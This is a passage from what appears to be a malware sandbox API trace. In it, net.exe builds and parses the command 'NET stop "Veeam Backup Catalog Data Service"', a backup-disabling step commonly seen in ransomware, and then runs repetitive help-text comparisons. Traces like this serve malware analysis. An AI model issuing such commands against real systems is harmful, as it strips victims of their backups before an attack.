lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0200.334] WriteFile (in: hFile=0x26c, lpBuffer=0x784228, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ff360, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff360, lpOverlapped=0x0) returned 0 [0200.334] LocalFree (hMem=0x784228) returned 0x0 [0200.334] GetFileType (hFile=0x26c) returned 0x3 [0200.334] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x783db8 [0200.334] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x783db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nx", lpUsedDefaultChar=0x0) returned 2 [0200.334] WriteFile (in: hFile=0x26c, lpBuffer=0x783db8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff360, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff360, lpOverlapped=0x0) returned 0 [0200.334] LocalFree (hMem=0x783db8) returned 0x0 [0200.335] wcscpy_s (in: _Destination=0x2ff418, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Veeam", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam ") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam ", _SizeInWords=0x200, _Source="Backup", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam Backup", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup ") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam Backup ", _SizeInWords=0x200, _Source="Catalog", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup Catalog") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam Backup Catalog", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup Catalog ") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam Backup Catalog ", _SizeInWords=0x200, _Source="Data", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup Catalog Data") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam Backup Catalog Data", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup Catalog Data ") returned 0x0 [0200.335] wcsncat_s (in: _Destination="NET stop ΓÇ£Veeam Backup Catalog Data ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥") returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x댸W/ѰWɬ") returned 0xad [0200.335] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | NO}] [/MI", _MaxCount=0x30) returned 18 [0200.335] LocalFree (hMem=0x785890) returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x2e [0200.335] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DEL}\r\n\r\n", _MaxCount=0x30) returned 16 [0200.335] LocalFree (hMem=0x783fa0) returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x7d [0200.335] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time]\r\n ", _MaxCount=0x30) returned 16 [0200.335] LocalFree (hMem=0x785890) returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x26 [0200.335] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x30) returned 16 [0200.335] LocalFree (hMem=0x783fa0) returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.335] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x30) returned 16 [0200.335] LocalFree (hMem=0x783fa0) returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x1b [0200.335] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x30) returned 13 [0200.335] LocalFree (hMem=0x783fa0) returned 0x0 [0200.335] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0xbe [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]] [/DOMAI", _MaxCount=0x30) returned 12 [0200.336] LocalFree (hMem=0x785890) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x33 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET command /HELP\r", _MaxCount=0x30) returned 11 [0200.336] LocalFree (hMem=0x783fa0) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x30) returned 11 [0200.336] LocalFree (hMem=0x783fa0) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0xc1 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"text\"]] [/", _MaxCount=0x30) returned 7 [0200.336] LocalFree (hMem=0x785890) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x16 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x30) returned 3 [0200.336] LocalFree (hMem=0x783fa0) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x33 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] [/LIST]\r", _MaxCount=0x30) returned 15 [0200.336] LocalFree (hMem=0x783fa0) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x234 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharename=drive:", _MaxCount=0x30) returned 12 [0200.336] LocalFree (hMem=0x785890) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x13 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x30) returned 14 [0200.336] LocalFree (hMem=0x783fa0) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.336] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x30) returned 14 [0200.336] LocalFree (hMem=0x783fa0) returned 0x0 [0200.336] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x16 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x11 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x12 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0xf [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x17 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x18 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x2a [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n\r\n", _MaxCount=0x30) returned 14 [0200.337] LocalFree (hMem=0x783fa0) returned 0x0 [0200.337] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x15 [0200.337] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x30) returned 19 [0200.338] LocalFree (hMem=0x783fa0) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x58 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:domainnam", _MaxCount=0x30) returned -1 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x184 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computername\\sharen", _MaxCount=0x30) returned -2 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xc7 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [options]] [/", _MaxCount=0x30) returned -2 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x47 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/ALL] | /D", _MaxCount=0x30) returned -3 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xc2 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG | CONTIN", _MaxCount=0x30) returned 19 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x319 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start service", _MaxCount=0x30) returned -5 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x483 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are used to in", _MaxCount=0x30) returned -5 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.338] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xa86 [0200.338] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are used wit", _MaxCount=0x30) returned 4 [0200.338] LocalFree (hMem=0x785890) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0x54 [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data ServiceΓÇ¥", _String2="\r\nFor more information on tools see the command-", _MaxCount=0x30) returned 97 [0200.339] LocalFree (hMem=0x785890) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/墐x/") returned 0xad [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes ", _MaxCount=0x25) returned 18 [0200.339] LocalFree (hMem=0x785890) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x2e [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET COMPUTER\r\n\\\\computername {/ADD | ", _MaxCount=0x25) returned 16 [0200.339] LocalFree (hMem=0x783fa0) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x7d [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:t", _MaxCount=0x25) returned 16 [0200.339] LocalFree (hMem=0x785890) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x26 [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r", _MaxCount=0x25) returned 16 [0200.339] LocalFree (hMem=0x783fa0) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x25) returned 16 [0200.339] LocalFree (hMem=0x783fa0) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x1b [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x25) returned 13 [0200.339] LocalFree (hMem=0x783fa0) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0xbe [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text", _MaxCount=0x25) returned 12 [0200.339] LocalFree (hMem=0x785890) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x33 [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET com", _MaxCount=0x25) returned 11 [0200.339] LocalFree (hMem=0x783fa0) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x19 [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x25) returned 11 [0200.339] LocalFree (hMem=0x783fa0) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0xc1 [0200.339] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:", _MaxCount=0x25) returned 7 [0200.339] LocalFree (hMem=0x785890) returned 0x0 [0200.339] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x16 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x25) returned 3 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x33 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET SESSION\r\n[\\\\computername] [/DELET", _MaxCount=0x25) returned 15 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="墐x⡋瓢/㾠x/") returned 0x234 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET SHARE\r\nsharename\r\n share", _MaxCount=0x25) returned 12 [0200.340] LocalFree (hMem=0x785890) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/墐x/") returned 0x13 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START BROWSER\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff360, nSize=0x0, Arguments=0x2ff35c | out: lpBuffer="㾠x⡋瓢/㾠x/") returned 0x14 [0200.340] _wcsnicmp (_String1="NET stop ΓÇ£Veeam Backup Catalog Data", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x25) returned 14 [0200.340] LocalFree (hMem=0x783fa0) returned 0x0 [0200.340] FormatMessageW (in: dwFlags=0x1900, 